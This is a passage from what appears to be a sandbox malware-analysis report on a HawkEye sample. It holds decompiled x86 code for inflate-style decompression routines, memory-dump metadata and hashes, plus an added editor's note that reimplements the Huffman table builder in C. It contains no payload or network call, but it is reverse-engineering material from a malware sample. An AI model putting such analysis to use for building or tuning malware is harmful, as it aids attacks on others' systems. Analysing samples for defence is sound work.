                                                                      											__ecx = __esi[0x26e8];
                                                                      											__eflags = __edi - __ecx;
                                                                      											if(__edi != __ecx) {
                                                                      												L163:
                                                                      												__esi[0x26ea] = __edi;
                                                                      												__eax = E00406804( *((intOrPtr*)(__ebp + 8)));
                                                                      												__edi = __esi[0x26ea];
                                                                      												__ecx = __esi[0x26e9];
                                                                      												__eflags = __edi - __ecx;
                                                                      												 *(__ebp - 0x30) = __edi;
                                                                      												}
                                                                      												L77:
                                                                      												__eax =  *(0x4093b0 + __eax * 2) & 0x0000ffff;
                                                                      												__eax = __eax &  *(__ebp - 0x40);
                                                                      												__ecx = __esi[0x144];
                                                                      												__eax = __esi[0x144] + __eax * 4;
                                                                      												__edx =  *(__eax + 1) & 0x000000ff;
                                                                      												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                      												__eflags = __eax - 0x10;
                                                                      												 *(__ebp - 0x14) = __eax;
                                                                      												if(__eax >= 0x10) {
                                                                      													L79:
                                                                      													__eflags = __eax - 0x12;
                                                                      													if(__eax != 0x12) {
                                                                      														__eax = __eax + 0xfffffff2;
                                                                      														 *(__ebp - 8) = 3;
                                                                      													} else {
                                                                      														_push(7);
                                                                      														 *(__ebp - 8) = 0xb;
                                                                      														_pop(__eax);
                                                                      													}
                                                                      													while(1) {
                                                                      														L84:
                                                                      														__ecx = __eax + __edx;
                                                                      														__eflags = __ebx - __eax + __edx;
                                                                      														if(__ebx >= __eax + __edx) {
                                                                      															break;
                                                                      														}
                                                                      														L82:
                                                                      														__eflags =  *(__ebp - 0x34);
                                                                      														if( *(__ebp - 0x34) == 0) {
                                                                      															goto L182;
                                                                      														}
                                                                      														L83:
                                                                      														__ecx =  *(__ebp - 0x38);
                                                                      														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                      														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                      														__ecx = __ebx;
                                                                      														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                      														__ebx = __ebx + 8;
                                                                      														__eflags = __ebx;
                                                                      													}
                                                                      													L85:
                                                                      													__ecx = __edx;
                                                                      													__ebx = __ebx - __edx;
                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                      													 *(0x4093b0 + __eax * 2) & 0x0000ffff =  *(0x4093b0 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                      													__edx =  *(__ebp - 8);
                                                                      													__ebx = __ebx - __eax;
                                                                      													__edx =  *(__ebp - 8) + ( *(0x4093b0 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                      													__ecx = __eax;
                                                                      													__eax = __esi[1];
                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                      													__ecx = __esi[2];
                                                                      													__eax = __eax >> 5;
                                                                      													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                      													__eax = __eax & 0x0000001f;
                                                                      													__eax = __edi + __eax + 0x102;
                                                                      													__edi = __edx + __ecx;
                                                                      													__eflags = __edx + __ecx - __eax;
                                                                      													if(__edx + __ecx > __eax) {
                                                                      														goto L9;
                                                                      													}
                                                                      													L86:
                                                                      													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                      													if( *(__ebp - 0x14) != 0x10) {
                                                                      														L89:
                                                                      														__edi = 0;
                                                                      														__eflags = 0;
                                                                      														L90:
                                                                      														__eax = __esi + 0xc + __ecx * 4;
                                                                      														do {
                                                                      															L91:
                                                                      															 *__eax = __edi;
                                                                      															__ecx = __ecx + 1;
                                                                      															__eax = __eax + 4;
                                                                      															__edx = __edx - 1;
                                                                      															__eflags = __edx;
                                                                      														} while (__edx != 0);
                                                                      														__esi[2] = __ecx;
                                                                      														continue;
                                                                      													}
                                                                      													L87:
                                                                      													__eflags = __ecx - 1;
                                                                      													if(__ecx < 1) {
                                                                      														goto L9;
                                                                      													}
                                                                      													L88:
                                                                      													__edi =  *(__esi + 8 + __ecx * 4);
                                                                      													goto L90;
                                                                      												}
                                                                      												L78:
                                                                      												__ecx = __edx;
                                                                      												__ebx = __ebx - __edx;
                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                      												__ecx = __esi[2];
                                                                      												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                      												__esi[2] = __esi[2] + 1;
                                                                      											}
                                                                      											L94:
                                                                      											__eax = __esi[1];
                                                                      											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                      											__edi = __eax;
                                                                      											__eax = __eax >> 5;
                                                                      											__edi = __edi & 0x0000001f;
                                                                      											__ecx = 0x101;
                                                                      											__eax = __eax & 0x0000001f;
                                                                      											__edi = __edi + 0x101;
                                                                      											__eax = __eax + 1;
                                                                      											__edx = __ebp - 0xc;
                                                                      											 *(__ebp - 0x14) = __eax;
                                                                      											 &(__esi[0x148]) = __ebp - 4;
                                                                      											 *(__ebp - 4) = 9;
                                                                      											__ebp - 0x18 =  &(__esi[3]);
                                                                      											 *(__ebp - 0x10) = 6;
                                                                      											__eax = E0040686C( &(__esi[3]), __edi, 0x101, 0x407320, 0x407360, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                      											__eflags =  *(__ebp - 4);
                                                                      											if( *(__ebp - 4) == 0) {
                                                                      												__eax = __eax | 0xffffffff;
                                                                      												__eflags = __eax;
                                                                      											}
                                                                      											__eflags = __eax;
                                                                      											if(__eax != 0) {
                                                                      												goto L9;
                                                                      											} else {
                                                                      												L97:
                                                                      												__ebp - 0xc =  &(__esi[0x148]);
                                                                      												__ebp - 0x10 = __ebp - 0x1c;
                                                                      												__eax = __esi + 0xc + __edi * 4;
                                                                      												__eax = E0040686C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x4073a0, 0x4073dc, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                      												__eflags = __eax;
                                                                      												if(__eax != 0) {
                                                                      													goto L9;
                                                                      												}
                                                                      												L98:
                                                                      												__eax =  *(__ebp - 0x10);
                                                                      												__eflags =  *(__ebp - 0x10);
                                                                      												if( *(__ebp - 0x10) != 0) {
                                                                      													L100:
                                                                      													__cl =  *(__ebp - 4);
                                                                      													 *__esi =  *__esi & 0x00000000;
                                                                      													__eflags =  *__esi;
                                                                      													__esi[4] = __al;
                                                                      													__eax =  *(__ebp - 0x18);
                                                                      													__esi[5] =  *(__ebp - 0x18);
                                                                      													__eax =  *(__ebp - 0x1c);
                                                                      													__esi[4] = __cl;
                                                                      													__esi[6] =  *(__ebp - 0x1c);
                                                                      													goto L101;
                                                                      												}
                                                                      												L99:
                                                                      												__eflags = __edi - 0x101;
                                                                      												if(__edi > 0x101) {
                                                                      													goto L9;
                                                                      												}
                                                                      												goto L100;
                                                                      											}
                                                                      										case 0xe:
                                                                      											goto L9;
                                                                      										case 0xf:
                                                                      											L175:
                                                                      											__eax =  *(__ebp - 0x30);
                                                                      											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                      											__eax = E00406804( *((intOrPtr*)(__ebp + 8)));
                                                                      											__ecx = __esi[0x26ea];
                                                                      											__edx = __esi[0x26e9];
                                                                      											__eflags = __ecx - __edx;
                                                                      											 *(__ebp - 0x30) = __ecx;
                                                                      											if(__ecx >= __edx) {
                                                                      												__eax = __esi[0x26e8];
                                                                      												__eax = __esi[0x26e8] - __ecx;
                                                                      												__eflags = __eax;
                                                                      											} else {
                                                                      												__edx = __edx - __ecx;
                                                                      												__eax = __edx - __ecx - 1;
                                                                      											}
                                                                      											__eflags = __ecx - __edx;
                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                      											if(__ecx != __edx) {
                                                                      												L183:
                                                                      												__edi = 0;
                                                                      												goto L10;
                                                                      											} else {
                                                                      												L179:
                                                                      												__eax = __esi[0x145];
                                                                      												__eflags = __eax - 8;
                                                                      												 *__esi = __eax;
                                                                      												if(__eax != 8) {
                                                                      													L184:
                                                                      													0 = 1;
                                                                      													goto L10;
                                                                      												}
                                                                      												goto L180;
                                                                      											}
                                                                      									}
                                                                      								}
                                                                      								L181:
                                                                      								goto L9;
                                                                      							}
                                                                      							L70:
                                                                      							if( *__edi == __eax) {
                                                                      								goto L72;
                                                                      							}
                                                                      							L71:
                                                                      							__esi[2] = __esi[2] & __eax;
                                                                      							 *__esi = 0xd;
                                                                      							goto L93;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L182:
                                                                      				_t443 = 0;
                                                                      				_t446[0x147] =  *(_t448 - 0x40);
                                                                      				_t446[0x146] = _t425;
                                                                      				( *(_t448 + 8))[1] = 0;
                                                                      				goto L11;
                                                                      			}









                                                                      0x00406789
                                                                      0x00406789
                                                                      0x00406789
                                                                      0x0040678e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405dc6
                                                                      0x00405dc6
                                                                      0x00000000
                                                                      0x004063c1
                                                                      0x004063c1
                                                                      0x004063c5
                                                                      0x004063c8
                                                                      0x004063cb
                                                                      0x004063ce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004063d4
                                                                      0x004063d4
                                                                      0x004063f9
                                                                      0x004063f9
                                                                      0x004063f9
                                                                      0x004063fb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004063d9
                                                                      0x004063d9
                                                                      0x004063dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004063e3
                                                                      0x004063e3
                                                                      0x004063e6
                                                                      0x004063e9
                                                                      0x004063ec
                                                                      0x004063ee
                                                                      0x004063f0
                                                                      0x004063f3
                                                                      0x004063f6
                                                                      0x004063f6
                                                                      0x004063f6
                                                                      0x004063fd
                                                                      0x004063fd
                                                                      0x00406405
                                                                      0x00406408
                                                                      0x0040640b
                                                                      0x0040640e
                                                                      0x00406412
                                                                      0x00406415
                                                                      0x00406417
                                                                      0x0040641a
                                                                      0x0040641c
                                                                      0x00406430
                                                                      0x00406430
                                                                      0x00406433
                                                                      0x0040644d
                                                                      0x0040644d
                                                                      0x00406450
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406456
                                                                      0x00406456
                                                                      0x00406459
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040645f
                                                                      0x0040645f
                                                                      0x00000000
                                                                      0x0040645f
                                                                      0x00406435
                                                                      0x00406438
                                                                      0x0040643f
                                                                      0x00406442
                                                                      0x00000000
                                                                      0x00406442
                                                                      0x0040641e
                                                                      0x00406422
                                                                      0x00406425
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040646a
                                                                      0x0040646a
                                                                      0x0040648f
                                                                      0x0040648f
                                                                      0x0040648f
                                                                      0x00406491
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040646f
                                                                      0x0040646f
                                                                      0x00406473
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406479
                                                                      0x00406479
                                                                      0x0040647c
                                                                      0x0040647f
                                                                      0x00406482
                                                                      0x00406484
                                                                      0x00406486
                                                                      0x00406489
                                                                      0x0040648c
                                                                      0x0040648c
                                                                      0x0040648c
                                                                      0x00406493
                                                                      0x0040649b
                                                                      0x0040649e
                                                                      0x004064a1
                                                                      0x004064a3
                                                                      0x004064a6
                                                                      0x004064a6
                                                                      0x004064a8
                                                                      0x004064ac
                                                                      0x004064af
                                                                      0x004064b2
                                                                      0x004064b5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064bb
                                                                      0x004064bb
                                                                      0x004064e0
                                                                      0x004064e0
                                                                      0x004064e0
                                                                      0x004064e2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064c0
                                                                      0x004064c0
                                                                      0x004064c4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064ca
                                                                      0x004064ca
                                                                      0x004064cd
                                                                      0x004064d0
                                                                      0x004064d3
                                                                      0x004064d5
                                                                      0x004064d7
                                                                      0x004064da
                                                                      0x004064dd
                                                                      0x004064dd
                                                                      0x004064dd
                                                                      0x004064e4
                                                                      0x004064e4
                                                                      0x004064ec
                                                                      0x004064ef
                                                                      0x004064f2
                                                                      0x004064f5
                                                                      0x004064f9
                                                                      0x004064fc
                                                                      0x004064fe
                                                                      0x00406501
                                                                      0x00406504
                                                                      0x0040651e
                                                                      0x0040651e
                                                                      0x00406521
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406527
                                                                      0x00406527
                                                                      0x0040652a
                                                                      0x00406531
                                                                      0x00000000
                                                                      0x00406531
                                                                      0x00406506
                                                                      0x00406509
                                                                      0x00406510
                                                                      0x00406513
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406539
                                                                      0x00406539
                                                                      0x0040655e
                                                                      0x0040655e
                                                                      0x0040655e
                                                                      0x00406560
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040653e
                                                                      0x0040653e
                                                                      0x00406542
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406548
                                                                      0x00406548
                                                                      0x0040654b
                                                                      0x0040654e
                                                                      0x00406551
                                                                      0x00406553
                                                                      0x00406555
                                                                      0x00406558
                                                                      0x0040655b
                                                                      0x0040655b
                                                                      0x0040655b
                                                                      0x00406562
                                                                      0x0040656a
                                                                      0x0040656d
                                                                      0x00406570
                                                                      0x00406572
                                                                      0x00406575
                                                                      0x00406575
                                                                      0x00406577
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040657d
                                                                      0x0040657d
                                                                      0x00406580
                                                                      0x00406585
                                                                      0x00406587
                                                                      0x0040658d
                                                                      0x0040658f
                                                                      0x004065a4
                                                                      0x004065a6
                                                                      0x004065a6
                                                                      0x00406591
                                                                      0x00406597
                                                                      0x00406599
                                                                      0x0040659b
                                                                      0x0040659b
                                                                      0x004065a8
                                                                      0x004065ac
                                                                      0x004065af
                                                                      0x004065b5
                                                                      0x004065b5
                                                                      0x004065b8
                                                                      0x004065b8
                                                                      0x004065b8
                                                                      0x004065ba
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065c0
                                                                      0x004065c0
                                                                      0x004065c6
                                                                      0x004065c8
                                                                      0x004065ed
                                                                      0x004065f0
                                                                      0x004065f6
                                                                      0x004065fb
                                                                      0x00406601
                                                                      0x00406607
                                                                      0x00406609
                                                                      0x0040660c
                                                                      0x00406615
                                                                      0x0040661b
                                                                      0x0040661b
                                                                      0x0040660e
                                                                      0x00406610
                                                                      0x00406612
                                                                      0x00406612
                                                                      0x0040661d
                                                                      0x00406623
                                                                      0x00406625
                                                                      0x00406628
                                                                      0x0040662a
                                                                      0x00406630
                                                                      0x00406632
                                                                      0x00406634
                                                                      0x00406636
                                                                      0x00406638
                                                                      0x0040663b
                                                                      0x00406644
                                                                      0x00406647
                                                                      0x00406647
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x00406640
                                                                      0x00406640
                                                                      0x0040663b
                                                                      0x00406632
                                                                      0x00406649
                                                                      0x0040664b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040664b
                                                                      0x004065ca
                                                                      0x004065ca
                                                                      0x004065d0
                                                                      0x004065d6
                                                                      0x004065d8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065da
                                                                      0x004065da
                                                                      0x004065dc
                                                                      0x004065de
                                                                      0x004065e7
                                                                      0x004065e7
                                                                      0x004065e0
                                                                      0x004065e0
                                                                      0x004065e3
                                                                      0x004065e3
                                                                      0x004065e9
                                                                      0x004065eb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406651
                                                                      0x00406651
                                                                      0x00406656
                                                                      0x00406658
                                                                      0x00406659
                                                                      0x0040665a
                                                                      0x0040665b
                                                                      0x00406661
                                                                      0x00406664
                                                                      0x00406667
                                                                      0x0040666a
                                                                      0x0040666c
                                                                      0x00406672
                                                                      0x00406672
                                                                      0x00406675
                                                                      0x00406675
                                                                      0x00406675
                                                                      0x00406675
                                                                      0x0040667e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406683
                                                                      0x00406683
                                                                      0x00406686
                                                                      0x00406689
                                                                      0x0040668b
                                                                      0x00406722
                                                                      0x00406722
                                                                      0x00406725
                                                                      0x00406727
                                                                      0x00406728
                                                                      0x00406729
                                                                      0x0040672c
                                                                      0x00000000
                                                                      0x0040672c
                                                                      0x00406691
                                                                      0x00406691
                                                                      0x00406697
                                                                      0x00406699
                                                                      0x004066be
                                                                      0x004066c1
                                                                      0x004066c7
                                                                      0x004066cc
                                                                      0x004066d2
                                                                      0x004066d8
                                                                      0x004066da
                                                                      0x004066dd
                                                                      0x004066e6
                                                                      0x004066ec
                                                                      0x004062bf
                                                                      0x00000000
                                                                      0x004062bf
                                                                      0x00406215
                                                                      0x00406215
                                                                      0x00406217
                                                                      0x00406219
                                                                      0x0040621c
                                                                      0x0040621f
                                                                      0x00406223
                                                                      0x00406223
                                                                      0x004062f7
                                                                      0x004062f7
                                                                      0x004062fa
                                                                      0x00406301
                                                                      0x00406305
                                                                      0x00406307
                                                                      0x0040630a
                                                                      0x0040630d
                                                                      0x00406312
                                                                      0x00406315
                                                                      0x00406317
                                                                      0x00406318
                                                                      0x0040631b
                                                                      0x00406326
                                                                      0x00406329
                                                                      0x00406340
                                                                      0x00406345
                                                                      0x0040634c
                                                                      0x00406351
                                                                      0x00406355
                                                                      0x00406357
                                                                      0x00406357
                                                                      0x00406357
                                                                      0x0040635a
                                                                      0x0040635c
                                                                      0x00000000
                                                                      0x00406362
                                                                      0x00406362
                                                                      0x00406366
                                                                      0x00406371
                                                                      0x00406384
                                                                      0x00406389
                                                                      0x0040638e
                                                                      0x00406390
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406396
                                                                      0x00406396
                                                                      0x00406399
                                                                      0x0040639b
                                                                      0x004063a9
                                                                      0x004063a9
                                                                      0x004063ac
                                                                      0x004063ac
                                                                      0x004063af
                                                                      0x004063b2
                                                                      0x004063b5
                                                                      0x004063b8
                                                                      0x004063bb
                                                                      0x004063be
                                                                      0x00000000
                                                                      0x004063be
                                                                      0x0040639d
                                                                      0x0040639d
                                                                      0x004063a3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004063a3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406742
                                                                      0x00406742
                                                                      0x00406748
                                                                      0x0040674e
                                                                      0x00406753
                                                                      0x00406759
                                                                      0x0040675f
                                                                      0x00406761
                                                                      0x00406764
                                                                      0x0040676d
                                                                      0x00406773
                                                                      0x00406773
                                                                      0x00406766
                                                                      0x00406768
                                                                      0x0040676a
                                                                      0x0040676a
                                                                      0x00406775
                                                                      0x00406777
                                                                      0x0040677a
                                                                      0x004067b5
                                                                      0x004067b5
                                                                      0x00000000
                                                                      0x0040677c
                                                                      0x0040677c
                                                                      0x0040677c
                                                                      0x00406782
                                                                      0x00406785
                                                                      0x00406787
                                                                      0x004067bc
                                                                      0x004067be
                                                                      0x00000000
                                                                      0x004067be
                                                                      0x00000000
                                                                      0x00406787
                                                                      0x00000000
                                                                      0x00405dc6
                                                                      0x00406794
                                                                      0x00000000
                                                                      0x00406794
                                                                      0x004061a8
                                                                      0x004061aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061ac
                                                                      0x004061ac
                                                                      0x004061af
                                                                      0x00000000
                                                                      0x004061af
                                                                      0x004060f4
                                                                      0x004060b5
                                                                      0x00406799
                                                                      0x0040679c
                                                                      0x0040679e
                                                                      0x004067a7
                                                                      0x004067ad
                                                                      0x00000000

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: daefd34fde6f7fbed07744c6e647a958739c940e8bac480179e92ab9af4e1f14
                                                                      • Instruction ID: 6a2a399bce8cba23a38b40336a25ef91a896ee0b2f23fbec5292fe6e09a77363
                                                                      • Opcode Fuzzy Hash: daefd34fde6f7fbed07744c6e647a958739c940e8bac480179e92ab9af4e1f14
                                                                      • Instruction Fuzzy Hash: FEE17971900B09DFDB24CF59D880BAEBBF1EB44305F15892EE996A72C1D338AA51CF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

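Editor's note on the decompiled routine E0040686C below, with an added worked example that is not part of the Joe Sandbox report and not code from the sample. The decompile has the shape of the canonical-Huffman table builder used by inflate implementations (the gzip/zlib huft_build routine): a 16-entry code-length histogram (BMAX = 15, the memset of 0x10 dwords), a search for the shortest and longest length that also bounds the caller's lookup-table width, a 1 << j code-space walk that returns -1 when the lengths are over-subscribed, a value table ordered by code length at 0x42d2a0, and a limit of 0x5a0 entries (1440, zlib's MANY). That identification is an inference from these constants, not a finding stated by the report; if it holds, the function is statically linked decompression support (packer stub or runtime) rather than HawkEye's own logic, and is worth confirming as library code before spending reversing time on it. The C below reimplements only the part visible on this page (the decompile is cut off at the table-allocation step), with struct fields mapped to the decompile's variables; the 0 / -1 return values mirror the decompile, and the inputs (the RFC 1951 fixed literal/length code and a few short length sets) are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

#define BMAX  15    /* longest deflate code length: the 16-dword count array at _v116 */
#define N_MAX 288   /* largest deflate alphabet (literal/length codes) */

typedef struct {
    unsigned count[BMAX + 1]; /* c[]: codes per length; count[max_len] is padded at the end */
    unsigned min_len;         /* shortest length present (_v8 in the decompile) */
    unsigned max_len;         /* longest length present (_v28) */
    unsigned lookup_bits;     /* caller's table width bounded to [min_len, max_len] (*_a28) */
    unsigned unused;          /* code space left after the Kraft walk (_v52) */
    int      oversubscribed;  /* 1 when the lengths cannot form a prefix code */
    unsigned values[N_MAX];   /* symbols ordered by code length (the table at 0x42d2a0) */
    unsigned n_values;        /* symbols that have a non-zero length */
} huff_lengths;

/* lengths[0..n-1] is the code length of each symbol, 0 meaning unused.
 * Returns 0 for a usable code and -1 otherwise, the two return values
 * visible in E0040686C; out->oversubscribed and out->unused say which. */
int build_length_tables(const unsigned char *lengths, unsigned n,
                        unsigned lookup_bits, huff_lengths *out)
{
    unsigned offs[BMAX + 2];  /* x[]: first values[] slot for each length */
    unsigned minl, maxl, j, i;
    int y;

    memset(out, 0, sizeof *out);
    if (n == 0 || n > N_MAX)
        return -1;

    /* histogram of lengths: the first do/while loop over _a4 */
    for (i = 0; i < n; i++) {
        if (lengths[i] > BMAX)       /* the decompile silently assumes this */
            return -1;
        out->count[lengths[i]]++;
    }
    if (out->count[0] == n)          /* all zero: nothing to build, not an error */
        return 0;

    /* shortest and longest length, then bound the table width by them */
    for (minl = 1; minl <= BMAX && out->count[minl] == 0; minl++)
        ;
    for (maxl = BMAX; maxl > 0 && out->count[maxl] == 0; maxl--)
        ;
    out->min_len = minl;
    out->max_len = maxl;
    if (lookup_bits < minl) lookup_bits = minl;
    if (lookup_bits > maxl) lookup_bits = maxl;
    out->lookup_bits = lookup_bits;

    /* Kraft walk (the 1 << j loop): y is the code space still free at each
     * length; going negative means more codes than a prefix code can hold */
    for (y = 1 << minl, j = minl; j < maxl; j++, y <<= 1) {
        y -= (int)out->count[j];
        if (y < 0) { out->oversubscribed = 1; return -1; }
    }
    y -= (int)out->count[maxl];
    if (y < 0) { out->oversubscribed = 1; return -1; }
    out->unused = (unsigned)y;
    out->count[maxl] += (unsigned)y; /* pad the longest length to fill the space */

    /* starting offsets per length, then symbols in order of code length (L21) */
    offs[1] = 0;
    for (j = 1; j < maxl; j++)
        offs[j + 1] = offs[j] + out->count[j];
    for (i = 0; i < n; i++)
        if (lengths[i] != 0)
            out->values[offs[lengths[i]]++] = i;
    out->n_values = offs[maxl];

    /* complete, or the one-symbol code of length 1: the test made at L62 */
    return (out->unused == 0 || maxl == 1) ? 0 : -1;
}

/* Constructed sample input: the fixed literal/length code of RFC 1951, 3.2.6 */
void fixed_literal_lengths(unsigned char lengths[N_MAX])
{
    unsigned i;
    for (i = 0; i < N_MAX; i++)
        lengths[i] = i < 144 ? 8 : i < 256 ? 9 : i < 280 ? 7 : 8;
}

int main(void)
{
    static const unsigned char over[] = { 1, 1, 1 }; /* three 1-bit codes: over-subscribed */
    unsigned char fixed[N_MAX];
    huff_lengths h;
    int status;

    fixed_literal_lengths(fixed);
    status = build_length_tables(fixed, N_MAX, 9, &h);
    printf("fixed code: status %d, lengths %u..%u, table bits %u, unused %u\n",
           status, h.min_len, h.max_len, h.lookup_bits, h.unused);
    status = build_length_tables(over, 3, 9, &h);
    printf("{1,1,1}: status %d, over-subscribed %d\n", status, h.oversubscribed);
    return 0;
}
```

To match this against the decompile, compare the 16-entry histogram and the two length searches with the loops that set _v8 and _v28, the Kraft walk with the 1 << j loop that jumps to L64, and the values[] fill with the L21 loop that writes 0x42d2a0. Note that, like the decompile, the routine reports an incomplete code (unused != 0 with more than one length) with the same -1 as an over-subscribed one; the oversubscribed and unused fields are added here so the two cases can be told apart.
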
                                                                      C-Code - Quality: 100%
                                                                      			E0040686C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				intOrPtr _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				intOrPtr* _v32;
                                                                      				signed int* _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				intOrPtr _v48;
                                                                      				intOrPtr _v52;
                                                                      				void _v116;
                                                                      				signed int _v176;
                                                                      				signed int _v180;
                                                                      				signed int _v240;
                                                                      				signed int _t166;
                                                                      				signed int _t168;
                                                                      				intOrPtr _t175;
                                                                      				signed int _t181;
                                                                      				void* _t182;
                                                                      				intOrPtr _t183;
                                                                      				signed int* _t184;
                                                                      				signed int _t186;
                                                                      				signed int _t187;
                                                                      				signed int* _t189;
                                                                      				signed int _t190;
                                                                      				intOrPtr* _t191;
                                                                      				intOrPtr _t192;
                                                                      				signed int _t193;
                                                                      				signed int _t195;
                                                                      				signed int _t200;
                                                                      				signed int _t205;
                                                                      				void* _t207;
                                                                      				short _t208;
                                                                      				signed char _t222;
                                                                      				signed int _t224;
                                                                      				signed int _t225;
                                                                      				signed int* _t232;
                                                                      				signed int _t233;
                                                                      				signed int _t234;
                                                                      				void* _t235;
                                                                      				signed int _t236;
                                                                      				signed int _t244;
                                                                      				signed int _t246;
                                                                      				signed int _t251;
                                                                      				signed int _t254;
                                                                      				signed int _t256;
                                                                      				signed int _t259;
                                                                      				signed int _t262;
                                                                      				void* _t263;
                                                                      				void* _t264;
                                                                      				signed int _t267;
                                                                      				intOrPtr _t269;
                                                                      				intOrPtr _t271;
                                                                      				signed int _t274;
                                                                      				intOrPtr* _t275;
                                                                      				unsigned int _t276;
                                                                      				void* _t277;
                                                                      				signed int _t278;
                                                                      				intOrPtr* _t279;
                                                                      				signed int _t281;
                                                                      				intOrPtr _t282;
                                                                      				intOrPtr _t283;
                                                                      				signed int* _t284;
                                                                      				signed int _t286;
                                                                      				signed int _t287;
                                                                      				signed int _t288;
                                                                      				signed int _t296;
                                                                      				signed int* _t297;
                                                                      				intOrPtr _t298;
                                                                      				void* _t299;
                                                                      
                                                                      				_t278 = _a8;
                                                                      				_t187 = 0x10;
                                                                      				memset( &_v116, 0, _t187 << 2);
                                                                      				_t189 = _a4;
                                                                      				_t233 = _t278;
                                                                      				do {
                                                                      					_t166 =  *_t189;
                                                                      					_t189 =  &(_t189[1]);
                                                                      					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                      					_t233 = _t233 - 1;
                                                                      				} while (_t233 != 0);
                                                                      				if(_v116 != _t278) {
                                                                      					_t279 = _a28;
                                                                      					_t267 =  *_t279;
                                                                      					_t190 = 1;
                                                                      					_a28 = _t267;
                                                                      					_t234 = 0xf;
                                                                      					while(1) {
                                                                      						_t168 = 0;
                                                                      						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t190 = _t190 + 1;
                                                                      						if(_t190 <= _t234) {
                                                                      							continue;
                                                                      						}
                                                                      						break;
                                                                      					}
                                                                      					_v8 = _t190;
                                                                      					if(_t267 < _t190) {
                                                                      						_a28 = _t190;
                                                                      					}
                                                                      					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                      						_t234 = _t234 - 1;
                                                                      						if(_t234 != 0) {
                                                                      							continue;
                                                                      						}
                                                                      						break;
                                                                      					}
                                                                      					_v28 = _t234;
                                                                      					if(_a28 > _t234) {
                                                                      						_a28 = _t234;
                                                                      					}
                                                                      					 *_t279 = _a28;
                                                                      					_t181 = 1 << _t190;
                                                                      					while(_t190 < _t234) {
